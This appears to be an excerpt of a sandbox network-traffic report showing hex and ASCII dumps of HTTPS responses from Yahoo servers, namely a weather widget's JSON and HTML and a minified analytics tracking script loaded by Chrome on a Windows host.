                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 2fe9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 7b 22 61 73 73 65 74 73 22 3a 7b 22 63 73 73 22 3a 5b 7b 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 74 6f 70 22 2c 22 76 61 6c 75 65 22 3a 22 2f 61 61 71 2f 63 70 72 6f 70 73 2f 63 6f 6c 6f 72 73 5f 31 2e 31 2e 32 37 2e 6d 69 6e 2e 63 73 73 22 2c 22 6e 61 6d 65 22 3a 22 63 75 73 74 6f 6d 2d 70 72 6f 70 65 72 74 69 65 73 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 31 2e 32 37 22 7d 2c 7b 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 74 6f 70 22 2c 22 76 61 6c 75 65 22 3a 22 2f 61 61 71 2f 66 70 2f 63 73 73 2f 72 65 61 63 74 2d 77 61 66 65 72 2d 77 65 61 74 68 65 72 2e 57 65 61 74 68 65 72 50 72 65 76 69 65 77 52 65 66 72 65 73 68 2e 61 74 6f 6d 69 63 2e 6c 74 72 2e 32 61 32 35 31 61 30 64 64 62 33 64 37 63 34 65 63 31 33 66 34 65 33 35 65 65 33 35 64 64 32 62 2e 6d 69 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {"assets":{"css":[{"location":"top","value":"/aaq/cprops/colors_1.1.27.min.css","name":"custom-properties","version":"1.1.27"},{"location":"top","value":"/aaq/fp/css/react-wafer-weather.WeatherPreviewRefresh.atomic.ltr.2a251a0ddb3d7c4ec13f4e35ee35dd2b.min
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 65 72 6e 2e 6a 73 22 2c 22 6e 61 6d 65 22 3a 22 77 61 66 65 72 2d 69 6d 61 67 65 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 34 2e 30 22 7d 5d 7d 2c 22 64 61 74 61 22 3a 7b 7d 2c 22 68 74 6d 6c 22 3a 22 3c 64 69 76 20 69 64 3d 5c 22 67 72 69 64 2d 6c 61 79 6f 75 74 5c 22 20 63 6c 61 73 73 3d 5c 22 77 65 61 74 68 65 72 2d 63 61 72 64 5c 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 5c 22 44 28 66 29 20 41 69 28 63 29 20 4a 63 28 73 62 29 20 4d 62 28 31 34 70 78 29 5c 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 5c 22 44 28 66 29 20 41 69 28 63 29 5c 22 3e 3c 69 20 63 6c 61 73 73 3d 5c 22 48 28 31 36 70 78 29 20 42 64 65 6e 64 77 28 38 70 78 29 20 4d 65 6e 64 28 31 32 70 78 29 20 42 64 65 6e 64 73 28 73 29 20 42 64 72 73 28 32 70 78 29 20 42 64 65 6e 64 63 28 2d 2d 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ern.js","name":"wafer-image","version":"1.4.0"}]},"data":{},"html":"<div id=\"grid-layout\" class=\"weather-card\"><div class=\"D(f) Ai(c) Jc(sb) Mb(14px)\"><div class=\"D(f) Ai(c)\"><i class=\"H(16px) Bdendw(8px) Mend(12px) Bdends(s) Bdrs(2px) Bdendc(--h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 2d 31 2e 31 32 20 32 2e 35 2d 32 2e 35 20 32 2e 35 4d 31 31 2e 35 20 31 43 36 2e 38 30 36 20 31 20 33 20 34 2e 38 30 33 20 33 20 39 2e 34 39 33 63 30 20 33 2e 39 35 37 20 35 2e 37 20 31 30 2e 39 36 37 20 37 2e 35 39 32 20 31 33 2e 30 32 2e 35 37 34 2e 36 32 35 20 31 2e 31 36 37 2e 36 32 33 20 31 2e 37 34 20 30 43 31 34 2e 31 38 20 32 30 2e 35 31 34 20 32 30 20 31 33 2e 34 38 20 32 30 20 39 2e 34 39 34 20 32 30 20 34 2e 38 30 33 20 31 36 2e 31 39 34 20 31 20 31 31 2e 35 20 31 5c 22 3e 3c 2f 70 61 74 68 3e 3c 2f 73 76 67 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 48 69 64 64 65 6e 5c 22 3e 56 69 65 77 20 79 6f 75 72 20 4c 6f 63 61 74 69 6f 6e 73 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 5c 22 77 61 66 65 72 2d 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: -1.12 2.5-2.5 2.5M11.5 1C6.806 1 3 4.803 3 9.493c0 3.957 5.7 10.967 7.592 13.02.574.625 1.167.623 1.74 0C14.18 20.514 20 13.48 20 9.494 20 4.803 16.194 1 11.5 1\"></path></svg><span class=\"Hidden\">View your Locations</span></button><form class=\"wafer-f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC373INData Raw: 22 50 65 28 6e 29 20 43 75 72 28 70 29 5c 22 20 77 69 64 74 68 3d 5c 22 31 34 5c 22 20 73 74 79 6c 65 3d 5c 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 66 69 6c 6c 3a 76 61 72 28 2d 2d 77 68 69 74 65 29 3b 73 74 72 6f 6b 65 3a 76 61 72 28 2d 2d 77 68 69 74 65 29 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 5c 22 20 68 65 69 67 68 74 3d 5c 22 31 34 5c 22 20 76 69 65 77 42 6f 78 3d 5c 22 30 20 30 20 34 38 20 34 38 5c 22 20 64 61 74 61 2d 69 63 6f 6e 3d 5c 22 72 65 6d 6f 76 65 5c 22 3e 3c 70 61 74 68 20 64 3d 5c 22 4d 34 30 20 32 32 48 38 63 2d 31 2e 31 30 34 20 30 2d 32 20 2e 38 39 36 2d 32 20 32 73 2e 38 39 36 20 32 20 32 20 32 68 33 32 63 31 2e 31 30 34 20 30 20 32 2d 2e 38 39 36 20 32 2d 32 73 2d 2e 38 39 36 2d 32 2d 32 2d 32 7a 5c 22 3e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: "Pe(n) Cur(p)\" width=\"14\" style=\"vertical-align:top;fill:var(--white);stroke:var(--white);stroke-width:0\" height=\"14\" viewBox=\"0 0 48 48\" data-icon=\"remove\"><path d=\"M40 22H8c-1.104 0-2 .896-2 2s.896 2 2 2h32c1.104 0 2-.896 2-2s-.896-2-2-2z\">
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 29 20 42 64 77 28 30 29 20 57 28 31 30 30 25 29 20 43 75 72 28 70 29 20 54 61 28 63 29 20 42 64 72 73 28 38 70 78 29 20 72 61 70 69 64 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 77 66 2d 74 6f 67 67 6c 65 2d 63 6c 61 73 73 3d 5c 22 63 6c 69 63 6b 3a 61 64 64 3a 44 28 6e 29 3b 63 6c 69 63 6b 3a 72 65 6d 6f 76 65 3a 77 61 66 65 72 2d 66 6f 72 6d 2d 63 6f 6d 70 6c 65 74 65 5c 22 20 64 61 74 61 2d 77 66 2d 74 6f 67 67 6c 65 2d 74 61 72 67 65 74 3d 5c 22 23 77 65 61 74 68 65 72 2d 6c 6f 63 61 74 69 6f 6e 2d 70 69 63 6b 65 72 2d 66 6f 72 6d 5c 22 20 64 61 74 61 2d 77 66 2d 74 72 69 67 67 65 72 3d 5c 22 65 61 63 68 43 6c 69 63 6b 5c 22 20 64 61 74 61 2d 79 6c 6b 3d 5c 22 65 6c 6d 3a 73 65 74 74 69 6e 67 3b 65 6c 6d 74 3a 64 65 74 65 63 74 2d 6c 6f 63 61 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ) Bdw(0) W(100%) Cur(p) Ta(c) Bdrs(8px) rapidnofollow\" data-wf-toggle-class=\"click:add:D(n);click:remove:wafer-form-complete\" data-wf-toggle-target=\"#weather-location-picker-form\" data-wf-trigger=\"eachClick\" data-ylk=\"elm:setting;elmt:detect-locat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 34 36 2d 2e 36 33 34 20 30 2d 31 2e 31 34 35 2e 35 31 34 2d 31 2e 31 34 35 20 31 2e 31 34 37 76 32 2e 31 37 63 2d 34 2e 37 37 35 2d 2e 35 32 38 2d 38 2e 35 37 36 2d 34 2e 32 39 36 2d 39 2e 31 34 2d 39 2e 30 34 32 48 37 2e 39 33 63 2e 36 33 32 20 30 20 31 2e 31 34 36 2d 2e 35 31 35 20 31 2e 31 34 36 2d 31 2e 31 35 20 30 2d 2e 36 33 33 2d 2e 35 31 34 2d 31 2e 31 34 35 2d 31 2e 31 34 36 2d 31 2e 31 34 35 48 35 2e 36 34 33 63 2e 35 30 33 2d 34 2e 38 31 33 20 34 2e 33 33 38 2d 38 2e 36 35 20 39 2e 31 36 2d 39 2e 31 38 32 7a 5c 22 3e 3c 2f 70 61 74 68 3e 3c 2f 73 76 67 3e 3c 2f 62 75 74 74 6f 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 43 28 2d 2d 77 61 74 65 72 6d 65 6c 6f 6e 29 20 50 28 32 30 70 78 29 20 46 7a 28 31 32 70 78 29 20 67 65 6f 6c 6f 63 61 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 46-.634 0-1.145.514-1.145 1.147v2.17c-4.775-.528-8.576-4.296-9.14-9.042H7.93c.632 0 1.146-.515 1.146-1.15 0-.633-.514-1.145-1.146-1.145H5.643c.503-4.813 4.338-8.65 9.16-9.182z\"></path></svg></button><span class=\"C(--watermelon) P(20px) Fz(12px) geolocat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 22 20 61 75 74 6f 43 6f 72 72 65 63 74 3d 5c 22 6f 6e 5c 22 20 61 75 74 6f 66 6f 63 75 73 3d 5c 22 5c 22 20 63 6c 61 73 73 3d 5c 22 77 61 66 65 72 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 20 77 61 66 65 72 2d 6c 6f 63 61 74 69 6f 6e 2d 70 69 63 6b 65 72 20 77 61 66 65 72 2d 77 65 61 74 68 65 72 2d 70 69 63 6b 65 72 20 57 28 31 30 30 25 29 20 4d 28 30 29 20 4c 68 28 31 29 20 42 64 77 28 30 29 20 42 78 73 68 28 6e 29 20 50 79 28 30 29 20 50 78 28 30 2e 34 65 6d 29 20 42 78 7a 28 62 62 29 20 46 7a 28 31 32 70 78 29 20 46 7a 28 31 32 70 78 29 2d 2d 6d 61 77 31 32 37 30 20 42 67 63 28 2d 2d 77 68 69 74 65 29 20 43 28 2d 2d 62 6c 61 63 6b 29 20 43 28 2d 2d 62 6c 61 63 6b 29 3a 3a 70 68 5c 22 20 64 61 74 61 2d 77 66 2d 6c 70 2d 62 6f 75 6e 64 61 72 79 3d 5c 22 77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: " autoCorrect=\"on\" autofocus=\"\" class=\"wafer-autocomplete wafer-location-picker wafer-weather-picker W(100%) M(0) Lh(1) Bdw(0) Bxsh(n) Py(0) Px(0.4em) Bxz(bb) Fz(12px) Fz(12px)--maw1270 Bgc(--white) C(--black) C(--black)::ph\" data-wf-lp-boundary=\"w


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    131192.168.2.44989087.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC366OUTGET /aaq/wf/wf-rapid-1.10.9-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC711INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: JoWSNKd+k3kdy1i8EanT2vuumQObgSJRwGnMIMEQkK3/uiMAtOIX+mxGMejaxMb+mQj1qrhYlTyWJlKMLZKeCkn2LbduIKQvG5zmbC4eM5Y=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: DVSM66Y3V5DGQ2A7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 10 Sep 2024 23:41:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 02 Jul 2024 08:11:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "da320d39602c7372e993ed8ca6026a92"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: D1eAABL3ZzqbxuHoTmJS4lz3o8UHw1Tk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 12677
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 1705164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 72 61 70 69 64 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 72 61 70 69 64 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-rapid",[],t):"object"==typeof exports?exports["wafer-rapid"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: totype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function o(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 72 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 72 2c 6e 29 26 26 28 65 5b 6e 5d 3d 72 5b 6e 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 76 61 72 20 72 3d 5b 5d 2c 6e 3d 21 30 2c 69 3d 21 31 2c 61 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 6f 2c 73 3d 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 3b 21 28 6e 3d 28 6f 3d 73 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 72 2e 70 75 73 68 28 6f 2e 76 61 6c 75 65 29 2c 21 74 7c 7c 72 2e 6c 65 6e 67 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ngth;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},g=function(){function e(e,t){var r=[],n=!0,i=!1,a=void 0;try{for(var o,s=e[Symbol.iterator]();!(n=(o=s.next()).done)&&(r.push(o.value),!t||r.lengt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 72 2d 6f 66 66 73 65 74 22 29 7c 7c 22 22 29 2e 73 70 6c 69 74 28 22 20 22 29 2c 63 3d 67 28 6c 2c 32 29 2c 75 3d 63 5b 30 5d 2c 66 3d 63 5b 31 5d 2c 64 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 49 2b 22 72 61 70 69 64 2d 74 72 69 67 67 65 72 2d 69 6e 74 65 72 76 61 6c 22 29 3b 22 63 6c 69 63 6b 22 21 3d 3d 73 26 26 22 65 61 63 68 43 6c 69 63 6b 22 21 3d 3d 73 7c 7c 65 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 61 73 2d 72 61 70 69 64 2d 63 6c 69 63 6b 22 2c 22 68 61 73 2d 77 61 66 65 72 2d 63 6c 69 63 6b 22 29 3b 76 61 72 20 70 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 49 2b 22 72 61 70 69 64 2d 6d 65 74 68 6f 64 22 29 2c 68 3d 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 49 2b 22 72 61 70 69 64 2d 6e 61 6d 65 22 29 7c 7c 22 22 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: r-offset")||"").split(" "),c=g(l,2),u=c[0],f=c[1],d=e.getAttribute(I+"rapid-trigger-interval");"click"!==s&&"eachClick"!==s||e.classList.add("has-rapid-click","has-wafer-click");var p=e.getAttribute(I+"rapid-method"),h=(e.getAttribute(I+"rapid-name")||"")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 63 6f 6e 45 76 65 6e 74 22 3d 3d 3d 61 29 7b 76 61 72 20 63 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 65 6c 65 6d 3b 62 2e 65 6d 69 74 4c 6f 67 28 7b 6e 61 6d 65 3a 22 57 61 66 65 72 52 61 70 69 64 22 2c 65 6c 65 6d 3a 63 2c 6d 65 74 61 3a 7b 69 31 33 6e 3a 6c 2c 6e 61 6d 65 3a 73 2c 74 79 70 65 3a 22 62 65 61 63 6f 6e 45 76 65 6e 74 22 7d 7d 29 2c 22 69 6e 74 65 6e 74 69 6f 6e 61 6c 56 69 65 77 22 3d 3d 3d 69 3f 65 2e 62 65 61 63 6f 6e 45 76 65 6e 74 28 22 69 6e 74 65 6e 74 69 6f 6e 61 6c 20 76 69 65 77 22 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 6c 2c 7b 6c 6c 33 3a 73 7d 29 29 3a 65 2e 62 65 61 63 6f 6e 45 76 65 6e 74 28 73 2c 6c 29 7d 65 6c 73 65 20 69 66 28 22 62 65 61 63 6f 6e 4c 69 6e 6b 56 69 65 77 73 22 3d 3d 3d 61 29 65 2e 62 65 61 63 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: conEvent"===a){var c=this._util.elem;b.emitLog({name:"WaferRapid",elem:c,meta:{i13n:l,name:s,type:"beaconEvent"}}),"intentionalView"===i?e.beaconEvent("intentional view",Object.assign({},l,{ll3:s})):e.beaconEvent(s,l)}else if("beaconLinkViews"===a)e.beaco
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 65 6d 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 68 61 73 2d 72 61 70 69 64 2d 63 6c 69 63 6b 22 29 26 26 74 68 69 73 2e 5f 62 65 61 63 6f 6e 54 72 69 67 67 65 72 28 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 52 61 70 69 64 4d 6f 75 73 65 45 6e 74 65 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 65 64 7c 7c 28 56 28 74 68 69 73 2e 5f 73 74 61 74 65 2e 6d 6f 75 73 65 45 6e 74 65 72 54 69 6d 65 6f 75 74 2c 74 68 69 73 29 2c 74 68 69 73 2e 5f 73 74 61 74 65 2e 6d 6f 75 73 65 45 6e 74 65 72 54 69 6d 65 6f 75 74 3d 6a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 5f 62 65 61 63 6f 6e 54 72 69 67 67 65 72 28 29 7d 2c 31 30 30 2c 74 68 69 73 29 29 7d 7d 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: em.classList.contains("has-rapid-click")&&this._beaconTrigger()}},{key:"handleRapidMouseEnter",value:function(){var e=this;this._destroyed||(V(this._state.mouseEnterTimeout,this),this._state.mouseEnterTimeout=j(function(){e._beaconTrigger()},100,this))}},
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 26 26 28 6e 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2e 6b 65 79 2c 6e 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 72 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 72 29 2c 6e 26 26 65 28 74 2c 6e 29 2c 74 7d 7d 28 29 2c 52 3d 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 72 2c 6e 29 7b 6e 75 6c 6c 3d 3d 3d 74 26 26 28 74 3d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 29 3b 76 61 72 20 69 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 72 29 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 69 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: &&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(t,r,n){return r&&e(t.prototype,r),n&&e(t,n),t}}(),R=function e(t,r,n){null===t&&(t=Function.prototype);var i=Object.getOwnPropertyDescriptor(t,r);if(void 0===i){var a=Object.getPrototypeO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 6f 2e 72 65 6d 6f 76 65 4d 6f 64 75 6c 65 28 6c 29 2c 65 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 77 61 66 65 72 2d 72 61 70 69 64 2d 74 72 61 63 6b 65 64 22 29 2c 21 30 7d 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 72 3d 65 2e 72 6f 6f 74 2c 6e 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f 64 6f 63 75 6d 65 6e 74 3a 72 2c 69 3d 65 2e 73 65 6c 65 63 74 6f 72 2c 61 3d 76 6f 69 64 20 30 3d 3d 3d 69 3f 22 2e 77 61 66 65 72 2d 72 61 70 69 64 2d 6d 6f 64 75 6c 65 22 3a 69 2c 6c 3d 65 2e 76 61 6c 69 64 61 74 65 44 65 6c 61 79
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: o.removeModule(l),e.classList.remove("wafer-rapid-tracked"),!0},H=function(e){function t(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},r=e.root,n=void 0===r?document:r,i=e.selector,a=void 0===i?".wafer-rapid-module":i,l=e.validateDelay
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 69 66 28 52 28 74 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 73 79 6e 63 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 2c 65 29 2c 65 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e 65 6c 65 6d 65 6e 74 49 6e 73 74 61 6e 63 65 73 2c 6e 3d 46 28 65 29 3b 69 66 28 6e 29 72 65 74 75 72 6e 20 76 6f 69 64 20 71 28 6e 2c 72 29 3b 76 61 72 20 69 3d 4e 28 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 77 61 66 65 72 2d 72 61 70 69 64 2d 6d 6f 64 75 6c 65 22 29 29 3b 69 2e 6c 65 6e 67 74 68 3e 30 26 26 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 2e 63 61 6c 6c 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: if(R(t.prototype.__proto__||Object.getPrototypeOf(t.prototype),"sync",this).call(this,e),e){var r=this._state.elementInstances,n=F(e);if(n)return void q(n,r);var i=N(e.getElementsByClassName("wafer-rapid-module"));i.length>0&&Array.prototype.forEach.call(
